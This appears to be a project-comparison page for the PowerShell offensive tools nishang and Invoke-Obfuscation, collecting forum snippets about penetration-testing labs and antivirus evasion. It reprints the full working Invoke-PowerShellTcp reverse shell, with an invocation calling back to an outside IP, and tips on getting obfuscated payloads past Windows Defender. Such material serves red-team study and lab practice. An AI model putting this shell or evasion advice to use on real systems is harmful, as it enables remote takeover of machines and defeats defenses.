nishang
Invoke-Obfuscation
Our great sponsors
nishang | Invoke-Obfuscation | |
---|---|---|
15 | 10 | |
8,278 | 3,491 | |
- | - | |
0.0 | 0.0 | |
7 months ago | 8 months ago | |
PowerShell | PowerShell | |
GNU General Public License v3.0 or later | Apache License 2.0 |
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.
nishang
-
Bypassing Windows Defender (10 Ways)
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://github.com/nettitude/powershell/blob/master/powerfun.ps1 https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80
- Powershell scripts suggestions!
-
Discrepancies in detecting obfuscated payloads by Windows Defender?
After that I expanded my research and tried a payload from GitHub user samratashok and followed this Guide in which only the text encoding method is altered from ASCII to UTF8. And guess what? It actually worked, Windows Defender does not detect it!
-
Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)
I am going to copy/paste the following nishang Reverse Shell in the newly created file link.
-
Can't download script for the alfred room, (git repo issue)
I figured out what the issue was, sudo git clone only works on a directory not on a file so it could only have been https://github.com/samratashok/nishang/blob/master/Shells.git
On the room alfred, when I try to download the script into the opt directory I keep getting an error. is sudo git clone appropriate in this instance, along with changing the end of the url to .git? I'm 99% sure it is root@ip-10-10-96-225:/opt# sudo git clone https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.git Cloning into 'Invoke-PowerShellTcp'... fatal: repository I also tried using: sudo git remote add and sudo git remote add origin
sudo git clone https://github.com/samratashok/nishang.git
Invoke-Obfuscation
- Invoke-Obfuscation by Daniel bohannon on GitHub contains Trojan Pklotide.A anyone else aware of this I don’t believe it’s the decoder/encoder being flagged either Was anyone else aware of this, a lot of members relied on this tool.
-
hide source code of modules
Second result on google, it can't stop reverse engineering it will make it harder.
-
Discrepancies in detecting obfuscated payloads by Windows Defender?
I decided to learn something about obfuscating payloads so I read some articles and got onto our lab environment and started testing, for example with Invoke-Obfuscation. For the time being I stuck with obfuscating PowerShell payloads and testing them against Windows Defender.
-
PowerShell Protect - Audit and block PowerShell Scripts on Windows
Does it handle highly obfuscated scripts? For example the types of obfuscation you can generate from Invoke-Obfuscation
What are some alternatives?
powershell-universal - PowerShell Universal is the ultimate platform for building web-based IT tools.
AdminToolbox - Repository for the AdminToolbox PowerShell Modules
ConPtyShell - ConPtyShell - Fully Interactive Reverse Shell for Windows
psPAS - PowerShell module for CyberArk Privileged Access Security REST API
universal-dashboard - Build beautiful websites with PowerShell.
PoshC2 - A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
ChangelogManagement - A PowerShell module for reading and manipulating changelog files in Keep a Changelog 1.0.0 format.
GPOZaurr - Group Policy Eater is a PowerShell module that aims to gather information about Group Policies but also allows fixing issues that you may find in them.
PSGitHub - This PowerShell module contains commands to manage GitHub through its REST API.
red_team_attack_lab - Red Team Attack Lab for TTP testing & research
powershell-protect - Audit and block PowerShell scripts in your Windows environment.
PowerShellTraps - Collection of PowerShell traps and oddities